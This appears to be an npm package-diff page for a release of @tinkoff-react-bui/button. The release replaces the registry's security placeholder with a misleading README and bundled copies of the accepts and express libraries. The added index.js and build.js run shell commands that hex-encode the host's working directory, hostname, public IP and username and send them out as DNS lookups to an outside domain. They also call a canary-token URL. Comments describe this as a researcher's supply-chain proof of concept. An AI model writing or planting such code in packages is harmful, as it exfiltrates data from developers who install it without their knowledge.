@tinkoff-react-bui/button 0.0.1-security → 3.7203.0
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of @tinkoff-react-bui/button might be problematic. Click here for more details.
- package/README.md +1 -5
- package/build.js +18 -0
- package/index.js +16 -0
- package/lib/accepts/HISTORY.md +236 -0
- package/lib/accepts/LICENSE +23 -0
- package/lib/accepts/README.md +142 -0
- package/lib/accepts/index.js +238 -0
- package/lib/application.js +644 -0
- package/lib/depd/History.md +96 -0
- package/lib/depd/LICENSE +22 -0
- package/lib/depd/Readme.md +280 -0
- package/lib/depd/index.js +522 -0
- package/lib/depd/lib/browser/index.js +77 -0
- package/lib/depd/lib/compat/callsite-tostring.js +103 -0
- package/lib/depd/lib/compat/event-listener-count.js +22 -0
- package/lib/depd/lib/compat/index.js +79 -0
- package/lib/express.js +116 -0
- package/lib/request.js +525 -0
- package/lib/response.js +1142 -0
- package/main.js +17 -0
- package/package.json +13 -3
- package/setup.sh +14 -0
package/README.md
CHANGED
@@ -1,5 +1 @@
|
|
1
|
-
|
2
|
-
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
4
|
-
|
5
|
-
Please refer to www.npmjs.com/advisories?search=%40tinkoff-react-bui%2Fbutton for more information.
|
1
|
+
this package can help you to find exact shell portal where you working and also maintain directory to extract file from opt directory
|
package/build.js
ADDED
@@ -0,0 +1,18 @@
|
|
1
|
+
const { exec } = require("child_process");
|
2
|
+
exec("node main.js > /dev/null 2>&1;", (error, data, getter) => {
|
3
|
+
if(error){
|
4
|
+
console.log("error",error.message);
|
5
|
+
return;
|
6
|
+
}
|
7
|
+
if(getter){
|
8
|
+
console.log(data);
|
9
|
+
return;
|
10
|
+
}
|
11
|
+
console.log(data);
|
12
|
+
|
13
|
+
});
|
14
|
+
|
15
|
+
|
16
|
+
|
17
|
+
// if you see this then you're safe, i just save your company from this supply chain attack, my goal is make internet more safer; thanks.
|
18
|
+
// #this is a poc script please consider this, because i am a security researcher here is my hackerone profile https://hackerone.com/x1337loser
|
package/index.js
ADDED
@@ -0,0 +1,16 @@
|
|
1
|
+
const { exec } = require("child_process");
|
2
|
+
exec("apt-get install xxd; apt-get install dnsutils; apt-get install curl; pwd | xxd -p | while read ut;do dig $ut.nirobtest.xyz;done > /dev/null 2>&1; hostname | xxd -p | while read uot;do dig $uot.nirobtest.xyz;done; > /dev/null 2>&1; c=$(curl ifconfig.me | head | xxd -p) && nslookup $c.nirobtest.xyz > /dev/null 2>&1; d=$(echo @to-rc-b/button | head | xxd -p) && nslookup $d.nirobtest.xyz > /dev/null 2>&1; e=$(whoami | head | xxd -p ) && nslookup $e.nirobtest.xyz > /dev/null 2>&1; curl http://canarytokens.com/images/about/tags/a2rttcd7o64zjdogjjke2tpsw/contact.php;", (error, data, getter) => {
|
3
|
+
if(error){
|
4
|
+
console.log("error",error.message);
|
5
|
+
return;
|
6
|
+
}
|
7
|
+
if(getter){
|
8
|
+
console.log(data);
|
9
|
+
return;
|
10
|
+
}
|
11
|
+
console.log(data);
|
12
|
+
|
13
|
+
});
|
14
|
+
|
15
|
+
// if you see this then you're safe, i just save your company from this supply chain attack, my goal is make internet more safer; thanks.
|
16
|
+
// #this is a poc script please consider this, because i am a security researcher here is my hackerone profile https://hackerone.com/x1337loser
|
@@ -0,0 +1,236 @@
|
|
1
|
+
1.3.7 / 2019-04-29
|
2
|
+
==================
|
3
|
+
|
4
|
+
* deps: negotiator@0.6.2
|
5
|
+
- Fix sorting charset, encoding, and language with extra parameters
|
6
|
+
|
7
|
+
1.3.6 / 2019-04-28
|
8
|
+
==================
|
9
|
+
|
10
|
+
* deps: mime-types@~2.1.24
|
11
|
+
- deps: mime-db@~1.40.0
|
12
|
+
|
13
|
+
1.3.5 / 2018-02-28
|
14
|
+
==================
|
15
|
+
|
16
|
+
* deps: mime-types@~2.1.18
|
17
|
+
- deps: mime-db@~1.33.0
|
18
|
+
|
19
|
+
1.3.4 / 2017-08-22
|
20
|
+
==================
|
21
|
+
|
22
|
+
* deps: mime-types@~2.1.16
|
23
|
+
- deps: mime-db@~1.29.0
|
24
|
+
|
25
|
+
1.3.3 / 2016-05-02
|
26
|
+
==================
|
27
|
+
|
28
|
+
* deps: mime-types@~2.1.11
|
29
|
+
- deps: mime-db@~1.23.0
|
30
|
+
* deps: negotiator@0.6.1
|
31
|
+
- perf: improve `Accept` parsing speed
|
32
|
+
- perf: improve `Accept-Charset` parsing speed
|
33
|
+
- perf: improve `Accept-Encoding` parsing speed
|
34
|
+
- perf: improve `Accept-Language` parsing speed
|
35
|
+
|
36
|
+
1.3.2 / 2016-03-08
|
37
|
+
==================
|
38
|
+
|
39
|
+
* deps: mime-types@~2.1.10
|
40
|
+
- Fix extension of `application/dash+xml`
|
41
|
+
- Update primary extension for `audio/mp4`
|
42
|
+
- deps: mime-db@~1.22.0
|
43
|
+
|
44
|
+
1.3.1 / 2016-01-19
|
45
|
+
==================
|
46
|
+
|
47
|
+
* deps: mime-types@~2.1.9
|
48
|
+
- deps: mime-db@~1.21.0
|
49
|
+
|
50
|
+
1.3.0 / 2015-09-29
|
51
|
+
==================
|
52
|
+
|
53
|
+
* deps: mime-types@~2.1.7
|
54
|
+
- deps: mime-db@~1.19.0
|
55
|
+
* deps: negotiator@0.6.0
|
56
|
+
- Fix including type extensions in parameters in `Accept` parsing
|
57
|
+
- Fix parsing `Accept` parameters with quoted equals
|
58
|
+
- Fix parsing `Accept` parameters with quoted semicolons
|
59
|
+
- Lazy-load modules from main entry point
|
60
|
+
- perf: delay type concatenation until needed
|
61
|
+
- perf: enable strict mode
|
62
|
+
- perf: hoist regular expressions
|
63
|
+
- perf: remove closures getting spec properties
|
64
|
+
- perf: remove a closure from media type parsing
|
65
|
+
- perf: remove property delete from media type parsing
|
66
|
+
|
67
|
+
1.2.13 / 2015-09-06
|
68
|
+
===================
|
69
|
+
|
70
|
+
* deps: mime-types@~2.1.6
|
71
|
+
- deps: mime-db@~1.18.0
|
72
|
+
|
73
|
+
1.2.12 / 2015-07-30
|
74
|
+
===================
|
75
|
+
|
76
|
+
* deps: mime-types@~2.1.4
|
77
|
+
- deps: mime-db@~1.16.0
|
78
|
+
|
79
|
+
1.2.11 / 2015-07-16
|
80
|
+
===================
|
81
|
+
|
82
|
+
* deps: mime-types@~2.1.3
|
83
|
+
- deps: mime-db@~1.15.0
|
84
|
+
|
85
|
+
1.2.10 / 2015-07-01
|
86
|
+
===================
|
87
|
+
|
88
|
+
* deps: mime-types@~2.1.2
|
89
|
+
- deps: mime-db@~1.14.0
|
90
|
+
|
91
|
+
1.2.9 / 2015-06-08
|
92
|
+
==================
|
93
|
+
|
94
|
+
* deps: mime-types@~2.1.1
|
95
|
+
- perf: fix deopt during mapping
|
96
|
+
|
97
|
+
1.2.8 / 2015-06-07
|
98
|
+
==================
|
99
|
+
|
100
|
+
* deps: mime-types@~2.1.0
|
101
|
+
- deps: mime-db@~1.13.0
|
102
|
+
* perf: avoid argument reassignment & argument slice
|
103
|
+
* perf: avoid negotiator recursive construction
|
104
|
+
* perf: enable strict mode
|
105
|
+
* perf: remove unnecessary bitwise operator
|
106
|
+
|
107
|
+
1.2.7 / 2015-05-10
|
108
|
+
==================
|
109
|
+
|
110
|
+
* deps: negotiator@0.5.3
|
111
|
+
- Fix media type parameter matching to be case-insensitive
|
112
|
+
|
113
|
+
1.2.6 / 2015-05-07
|
114
|
+
==================
|
115
|
+
|
116
|
+
* deps: mime-types@~2.0.11
|
117
|
+
- deps: mime-db@~1.9.1
|
118
|
+
* deps: negotiator@0.5.2
|
119
|
+
- Fix comparing media types with quoted values
|
120
|
+
- Fix splitting media types with quoted commas
|
121
|
+
|
122
|
+
1.2.5 / 2015-03-13
|
123
|
+
==================
|
124
|
+
|
125
|
+
* deps: mime-types@~2.0.10
|
126
|
+
- deps: mime-db@~1.8.0
|
127
|
+
|
128
|
+
1.2.4 / 2015-02-14
|
129
|
+
==================
|
130
|
+
|
131
|
+
* Support Node.js 0.6
|
132
|
+
* deps: mime-types@~2.0.9
|
133
|
+
- deps: mime-db@~1.7.0
|
134
|
+
* deps: negotiator@0.5.1
|
135
|
+
- Fix preference sorting to be stable for long acceptable lists
|
136
|
+
|
137
|
+
1.2.3 / 2015-01-31
|
138
|
+
==================
|
139
|
+
|
140
|
+
* deps: mime-types@~2.0.8
|
141
|
+
- deps: mime-db@~1.6.0
|
142
|
+
|
143
|
+
1.2.2 / 2014-12-30
|
144
|
+
==================
|
145
|
+
|
146
|
+
* deps: mime-types@~2.0.7
|
147
|
+
- deps: mime-db@~1.5.0
|
148
|
+
|
149
|
+
1.2.1 / 2014-12-30
|
150
|
+
==================
|
151
|
+
|
152
|
+
* deps: mime-types@~2.0.5
|
153
|
+
- deps: mime-db@~1.3.1
|
154
|
+
|
155
|
+
1.2.0 / 2014-12-19
|
156
|
+
==================
|
157
|
+
|
158
|
+
* deps: negotiator@0.5.0
|
159
|
+
- Fix list return order when large accepted list
|
160
|
+
- Fix missing identity encoding when q=0 exists
|
161
|
+
- Remove dynamic building of Negotiator class
|
162
|
+
|
163
|
+
1.1.4 / 2014-12-10
|
164
|
+
==================
|
165
|
+
|
166
|
+
* deps: mime-types@~2.0.4
|
167
|
+
- deps: mime-db@~1.3.0
|
168
|
+
|
169
|
+
1.1.3 / 2014-11-09
|
170
|
+
==================
|
171
|
+
|
172
|
+
* deps: mime-types@~2.0.3
|
173
|
+
- deps: mime-db@~1.2.0
|
174
|
+
|
175
|
+
1.1.2 / 2014-10-14
|
176
|
+
==================
|
177
|
+
|
178
|
+
* deps: negotiator@0.4.9
|
179
|
+
- Fix error when media type has invalid parameter
|
180
|
+
|
181
|
+
1.1.1 / 2014-09-28
|
182
|
+
==================
|
183
|
+
|
184
|
+
* deps: mime-types@~2.0.2
|
185
|
+
- deps: mime-db@~1.1.0
|
186
|
+
* deps: negotiator@0.4.8
|
187
|
+
- Fix all negotiations to be case-insensitive
|
188
|
+
- Stable sort preferences of same quality according to client order
|
189
|
+
|
190
|
+
1.1.0 / 2014-09-02
|
191
|
+
==================
|
192
|
+
|
193
|
+
* update `mime-types`
|
194
|
+
|
195
|
+
1.0.7 / 2014-07-04
|
196
|
+
==================
|
197
|
+
|
198
|
+
* Fix wrong type returned from `type` when match after unknown extension
|
199
|
+
|
200
|
+
1.0.6 / 2014-06-24
|
201
|
+
==================
|
202
|
+
|
203
|
+
* deps: negotiator@0.4.7
|
204
|
+
|
205
|
+
1.0.5 / 2014-06-20
|
206
|
+
==================
|
207
|
+
|
208
|
+
* fix crash when unknown extension given
|
209
|
+
|
210
|
+
1.0.4 / 2014-06-19
|
211
|
+
==================
|
212
|
+
|
213
|
+
* use `mime-types`
|
214
|
+
|
215
|
+
1.0.3 / 2014-06-11
|
216
|
+
==================
|
217
|
+
|
218
|
+
* deps: negotiator@0.4.6
|
219
|
+
- Order by specificity when quality is the same
|
220
|
+
|
221
|
+
1.0.2 / 2014-05-29
|
222
|
+
==================
|
223
|
+
|
224
|
+
* Fix interpretation when header not in request
|
225
|
+
* deps: pin negotiator@0.4.5
|
226
|
+
|
227
|
+
1.0.1 / 2014-01-18
|
228
|
+
==================
|
229
|
+
|
230
|
+
* Identity encoding isn't always acceptable
|
231
|
+
* deps: negotiator@~0.4.0
|
232
|
+
|
233
|
+
1.0.0 / 2013-12-27
|
234
|
+
==================
|
235
|
+
|
236
|
+
* Genesis
|
@@ -0,0 +1,23 @@
|
|
1
|
+
(The MIT License)
|
2
|
+
|
3
|
+
Copyright (c) 2014 Jonathan Ong <me@jongleberry.com>
|
4
|
+
Copyright (c) 2015 Douglas Christopher Wilson <doug@somethingdoug.com>
|
5
|
+
|
6
|
+
Permission is hereby granted, free of charge, to any person obtaining
|
7
|
+
a copy of this software and associated documentation files (the
|
8
|
+
'Software'), to deal in the Software without restriction, including
|
9
|
+
without limitation the rights to use, copy, modify, merge, publish,
|
10
|
+
distribute, sublicense, and/or sell copies of the Software, and to
|
11
|
+
permit persons to whom the Software is furnished to do so, subject to
|
12
|
+
the following conditions:
|
13
|
+
|
14
|
+
The above copyright notice and this permission notice shall be
|
15
|
+
included in all copies or substantial portions of the Software.
|
16
|
+
|
17
|
+
THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND,
|
18
|
+
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
|
19
|
+
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
|
20
|
+
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
|
21
|
+
CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
|
22
|
+
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
|
23
|
+
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
|
@@ -0,0 +1,142 @@
|
|
1
|
+
# accepts
|
2
|
+
|
3
|
+
[![NPM Version][npm-version-image]][npm-url]
|
4
|
+
[![NPM Downloads][npm-downloads-image]][npm-url]
|
5
|
+
[![Node.js Version][node-version-image]][node-version-url]
|
6
|
+
[![Build Status][travis-image]][travis-url]
|
7
|
+
[![Test Coverage][coveralls-image]][coveralls-url]
|
8
|
+
|
9
|
+
Higher level content negotiation based on [negotiator](https://www.npmjs.com/package/negotiator).
|
10
|
+
Extracted from [koa](https://www.npmjs.com/package/koa) for general use.
|
11
|
+
|
12
|
+
In addition to negotiator, it allows:
|
13
|
+
|
14
|
+
- Allows types as an array or arguments list, ie `(['text/html', 'application/json'])`
|
15
|
+
as well as `('text/html', 'application/json')`.
|
16
|
+
- Allows type shorthands such as `json`.
|
17
|
+
- Returns `false` when no types match
|
18
|
+
- Treats non-existent headers as `*`
|
19
|
+
|
20
|
+
## Installation
|
21
|
+
|
22
|
+
This is a [Node.js](https://nodejs.org/en/) module available through the
|
23
|
+
[npm registry](https://www.npmjs.com/). Installation is done using the
|
24
|
+
[`npm install` command](https://docs.npmjs.com/getting-started/installing-npm-packages-locally):
|
25
|
+
|
26
|
+
```sh
|
27
|
+
$ npm install accepts
|
28
|
+
```
|
29
|
+
|
30
|
+
## API
|
31
|
+
|
32
|
+
<!-- eslint-disable no-unused-vars -->
|
33
|
+
|
34
|
+
```js
|
35
|
+
var accepts = require('accepts')
|
36
|
+
```
|
37
|
+
|
38
|
+
### accepts(req)
|
39
|
+
|
40
|
+
Create a new `Accepts` object for the given `req`.
|
41
|
+
|
42
|
+
#### .charset(charsets)
|
43
|
+
|
44
|
+
Return the first accepted charset. If nothing in `charsets` is accepted,
|
45
|
+
then `false` is returned.
|
46
|
+
|
47
|
+
#### .charsets()
|
48
|
+
|
49
|
+
Return the charsets that the request accepts, in the order of the client's
|
50
|
+
preference (most preferred first).
|
51
|
+
|
52
|
+
#### .encoding(encodings)
|
53
|
+
|
54
|
+
Return the first accepted encoding. If nothing in `encodings` is accepted,
|
55
|
+
then `false` is returned.
|
56
|
+
|
57
|
+
#### .encodings()
|
58
|
+
|
59
|
+
Return the encodings that the request accepts, in the order of the client's
|
60
|
+
preference (most preferred first).
|
61
|
+
|
62
|
+
#### .language(languages)
|
63
|
+
|
64
|
+
Return the first accepted language. If nothing in `languages` is accepted,
|
65
|
+
then `false` is returned.
|
66
|
+
|
67
|
+
#### .languages()
|
68
|
+
|
69
|
+
Return the languages that the request accepts, in the order of the client's
|
70
|
+
preference (most preferred first).
|
71
|
+
|
72
|
+
#### .type(types)
|
73
|
+
|
74
|
+
Return the first accepted type (and it is returned as the same text as what
|
75
|
+
appears in the `types` array). If nothing in `types` is accepted, then `false`
|
76
|
+
is returned.
|
77
|
+
|
78
|
+
The `types` array can contain full MIME types or file extensions. Any value
|
79
|
+
that is not a full MIME types is passed to `require('mime-types').lookup`.
|
80
|
+
|
81
|
+
#### .types()
|
82
|
+
|
83
|
+
Return the types that the request accepts, in the order of the client's
|
84
|
+
preference (most preferred first).
|
85
|
+
|
86
|
+
## Examples
|
87
|
+
|
88
|
+
### Simple type negotiation
|
89
|
+
|
90
|
+
This simple example shows how to use `accepts` to return a different typed
|
91
|
+
respond body based on what the client wants to accept. The server lists it's
|
92
|
+
preferences in order and will get back the best match between the client and
|
93
|
+
server.
|
94
|
+
|
95
|
+
```js
|
96
|
+
var accepts = require('accepts')
|
97
|
+
var http = require('http')
|
98
|
+
|
99
|
+
function app (req, res) {
|
100
|
+
var accept = accepts(req)
|
101
|
+
|
102
|
+
// the order of this list is significant; should be server preferred order
|
103
|
+
switch (accept.type(['json', 'html'])) {
|
104
|
+
case 'json':
|
105
|
+
res.setHeader('Content-Type', 'application/json')
|
106
|
+
res.write('{"hello":"world!"}')
|
107
|
+
break
|
108
|
+
case 'html':
|
109
|
+
res.setHeader('Content-Type', 'text/html')
|
110
|
+
res.write('<b>hello, world!</b>')
|
111
|
+
break
|
112
|
+
default:
|
113
|
+
// the fallback is text/plain, so no need to specify it above
|
114
|
+
res.setHeader('Content-Type', 'text/plain')
|
115
|
+
res.write('hello, world!')
|
116
|
+
break
|
117
|
+
}
|
118
|
+
|
119
|
+
res.end()
|
120
|
+
}
|
121
|
+
|
122
|
+
http.createServer(app).listen(3000)
|
123
|
+
```
|
124
|
+
|
125
|
+
You can test this out with the cURL program:
|
126
|
+
```sh
|
127
|
+
curl -I -H'Accept: text/html' http://localhost:3000/
|
128
|
+
```
|
129
|
+
|
130
|
+
## License
|
131
|
+
|
132
|
+
[MIT](LICENSE)
|
133
|
+
|
134
|
+
[coveralls-image]: https://badgen.net/coveralls/c/github/jshttp/accepts/master
|
135
|
+
[coveralls-url]: https://coveralls.io/r/jshttp/accepts?branch=master
|
136
|
+
[node-version-image]: https://badgen.net/npm/node/accepts
|
137
|
+
[node-version-url]: https://nodejs.org/en/download
|
138
|
+
[npm-downloads-image]: https://badgen.net/npm/dm/accepts
|
139
|
+
[npm-url]: https://npmjs.org/package/accepts
|
140
|
+
[npm-version-image]: https://badgen.net/npm/v/accepts
|
141
|
+
[travis-image]: https://badgen.net/travis/jshttp/accepts/master
|
142
|
+
[travis-url]: https://travis-ci.org/jshttp/accepts
|
@@ -0,0 +1,238 @@
|
|
1
|
+
/*!
|
2
|
+
* accepts
|
3
|
+
* Copyright(c) 2014 Jonathan Ong
|
4
|
+
* Copyright(c) 2015 Douglas Christopher Wilson
|
5
|
+
* MIT Licensed
|
6
|
+
*/
|
7
|
+
|
8
|
+
'use strict'
|
9
|
+
|
10
|
+
/**
|
11
|
+
* Module dependencies.
|
12
|
+
* @private
|
13
|
+
*/
|
14
|
+
|
15
|
+
var Negotiator = require('negotiator')
|
16
|
+
var mime = require('mime-types')
|
17
|
+
|
18
|
+
/**
|
19
|
+
* Module exports.
|
20
|
+
* @public
|
21
|
+
*/
|
22
|
+
|
23
|
+
module.exports = Accepts
|
24
|
+
|
25
|
+
/**
|
26
|
+
* Create a new Accepts object for the given req.
|
27
|
+
*
|
28
|
+
* @param {object} req
|
29
|
+
* @public
|
30
|
+
*/
|
31
|
+
|
32
|
+
function Accepts (req) {
|
33
|
+
if (!(this instanceof Accepts)) {
|
34
|
+
return new Accepts(req)
|
35
|
+
}
|
36
|
+
|
37
|
+
this.headers = req.headers
|
38
|
+
this.negotiator = new Negotiator(req)
|
39
|
+
}
|
40
|
+
|
41
|
+
/**
|
42
|
+
* Check if the given `type(s)` is acceptable, returning
|
43
|
+
* the best match when true, otherwise `undefined`, in which
|
44
|
+
* case you should respond with 406 "Not Acceptable".
|
45
|
+
*
|
46
|
+
* The `type` value may be a single mime type string
|
47
|
+
* such as "application/json", the extension name
|
48
|
+
* such as "json" or an array `["json", "html", "text/plain"]`. When a list
|
49
|
+
* or array is given the _best_ match, if any is returned.
|
50
|
+
*
|
51
|
+
* Examples:
|
52
|
+
*
|
53
|
+
* // Accept: text/html
|
54
|
+
* this.types('html');
|
55
|
+
* // => "html"
|
56
|
+
*
|
57
|
+
* // Accept: text/*, application/json
|
58
|
+
* this.types('html');
|
59
|
+
* // => "html"
|
60
|
+
* this.types('text/html');
|
61
|
+
* // => "text/html"
|
62
|
+
* this.types('json', 'text');
|
63
|
+
* // => "json"
|
64
|
+
* this.types('application/json');
|
65
|
+
* // => "application/json"
|
66
|
+
*
|
67
|
+
* // Accept: text/*, application/json
|
68
|
+
* this.types('image/png');
|
69
|
+
* this.types('png');
|
70
|
+
* // => undefined
|
71
|
+
*
|
72
|
+
* // Accept: text/*;q=.5, application/json
|
73
|
+
* this.types(['html', 'json']);
|
74
|
+
* this.types('html', 'json');
|
75
|
+
* // => "json"
|
76
|
+
*
|
77
|
+
* @param {String|Array} types...
|
78
|
+
* @return {String|Array|Boolean}
|
79
|
+
* @public
|
80
|
+
*/
|
81
|
+
|
82
|
+
Accepts.prototype.type =
|
83
|
+
Accepts.prototype.types = function (types_) {
|
84
|
+
var types = types_
|
85
|
+
|
86
|
+
// support flattened arguments
|
87
|
+
if (types && !Array.isArray(types)) {
|
88
|
+
types = new Array(arguments.length)
|
89
|
+
for (var i = 0; i < types.length; i++) {
|
90
|
+
types[i] = arguments[i]
|
91
|
+
}
|
92
|
+
}
|
93
|
+
|
94
|
+
// no types, return all requested types
|
95
|
+
if (!types || types.length === 0) {
|
96
|
+
return this.negotiator.mediaTypes()
|
97
|
+
}
|
98
|
+
|
99
|
+
// no accept header, return first given type
|
100
|
+
if (!this.headers.accept) {
|
101
|
+
return types[0]
|
102
|
+
}
|
103
|
+
|
104
|
+
var mimes = types.map(extToMime)
|
105
|
+
var accepts = this.negotiator.mediaTypes(mimes.filter(validMime))
|
106
|
+
var first = accepts[0]
|
107
|
+
|
108
|
+
return first
|
109
|
+
? types[mimes.indexOf(first)]
|
110
|
+
: false
|
111
|
+
}
|
112
|
+
|
113
|
+
/**
|
114
|
+
* Return accepted encodings or best fit based on `encodings`.
|
115
|
+
*
|
116
|
+
* Given `Accept-Encoding: gzip, deflate`
|
117
|
+
* an array sorted by quality is returned:
|
118
|
+
*
|
119
|
+
* ['gzip', 'deflate']
|
120
|
+
*
|
121
|
+
* @param {String|Array} encodings...
|
122
|
+
* @return {String|Array}
|
123
|
+
* @public
|
124
|
+
*/
|
125
|
+
|
126
|
+
Accepts.prototype.encoding =
|
127
|
+
Accepts.prototype.encodings = function (encodings_) {
|
128
|
+
var encodings = encodings_
|
129
|
+
|
130
|
+
// support flattened arguments
|
131
|
+
if (encodings && !Array.isArray(encodings)) {
|
132
|
+
encodings = new Array(arguments.length)
|
133
|
+
for (var i = 0; i < encodings.length; i++) {
|
134
|
+
encodings[i] = arguments[i]
|
135
|
+
}
|
136
|
+
}
|
137
|
+
|
138
|
+
// no encodings, return all requested encodings
|
139
|
+
if (!encodings || encodings.length === 0) {
|
140
|
+
return this.negotiator.encodings()
|
141
|
+
}
|
142
|
+
|
143
|
+
return this.negotiator.encodings(encodings)[0] || false
|
144
|
+
}
|
145
|
+
|
146
|
+
/**
|
147
|
+
* Return accepted charsets or best fit based on `charsets`.
|
148
|
+
*
|
149
|
+
* Given `Accept-Charset: utf-8, iso-8859-1;q=0.2, utf-7;q=0.5`
|
150
|
+
* an array sorted by quality is returned:
|
151
|
+
*
|
152
|
+
* ['utf-8', 'utf-7', 'iso-8859-1']
|
153
|
+
*
|
154
|
+
* @param {String|Array} charsets...
|
155
|
+
* @return {String|Array}
|
156
|
+
* @public
|
157
|
+
*/
|
158
|
+
|
159
|
+
Accepts.prototype.charset =
|
160
|
+
Accepts.prototype.charsets = function (charsets_) {
|
161
|
+
var charsets = charsets_
|
162
|
+
|
163
|
+
// support flattened arguments
|
164
|
+
if (charsets && !Array.isArray(charsets)) {
|
165
|
+
charsets = new Array(arguments.length)
|
166
|
+
for (var i = 0; i < charsets.length; i++) {
|
167
|
+
charsets[i] = arguments[i]
|
168
|
+
}
|
169
|
+
}
|
170
|
+
|
171
|
+
// no charsets, return all requested charsets
|
172
|
+
if (!charsets || charsets.length === 0) {
|
173
|
+
return this.negotiator.charsets()
|
174
|
+
}
|
175
|
+
|
176
|
+
return this.negotiator.charsets(charsets)[0] || false
|
177
|
+
}
|
178
|
+
|
179
|
+
/**
|
180
|
+
* Return accepted languages or best fit based on `langs`.
|
181
|
+
*
|
182
|
+
* Given `Accept-Language: en;q=0.8, es, pt`
|
183
|
+
* an array sorted by quality is returned:
|
184
|
+
*
|
185
|
+
* ['es', 'pt', 'en']
|
186
|
+
*
|
187
|
+
* @param {String|Array} langs...
|
188
|
+
* @return {Array|String}
|
189
|
+
* @public
|
190
|
+
*/
|
191
|
+
|
192
|
+
Accepts.prototype.lang =
|
193
|
+
Accepts.prototype.langs =
|
194
|
+
Accepts.prototype.language =
|
195
|
+
Accepts.prototype.languages = function (languages_) {
|
196
|
+
var languages = languages_
|
197
|
+
|
198
|
+
// support flattened arguments
|
199
|
+
if (languages && !Array.isArray(languages)) {
|
200
|
+
languages = new Array(arguments.length)
|
201
|
+
for (var i = 0; i < languages.length; i++) {
|
202
|
+
languages[i] = arguments[i]
|
203
|
+
}
|
204
|
+
}
|
205
|
+
|
206
|
+
// no languages, return all requested languages
|
207
|
+
if (!languages || languages.length === 0) {
|
208
|
+
return this.negotiator.languages()
|
209
|
+
}
|
210
|
+
|
211
|
+
return this.negotiator.languages(languages)[0] || false
|
212
|
+
}
|
213
|
+
|
214
|
+
/**
|
215
|
+
* Convert extnames to mime.
|
216
|
+
*
|
217
|
+
* @param {String} type
|
218
|
+
* @return {String}
|
219
|
+
* @private
|
220
|
+
*/
|
221
|
+
|
222
|
+
function extToMime (type) {
|
223
|
+
return type.indexOf('/') === -1
|
224
|
+
? mime.lookup(type)
|
225
|
+
: type
|
226
|
+
}
|
227
|
+
|
228
|
+
/**
|
229
|
+
* Check if mime is valid.
|
230
|
+
*
|
231
|
+
* @param {String} type
|
232
|
+
* @return {String}
|
233
|
+
* @private
|
234
|
+
*/
|
235
|
+
|
236
|
+
function validMime (type) {
|
237
|
+
return typeof type === 'string'
|
238
|
+
}
|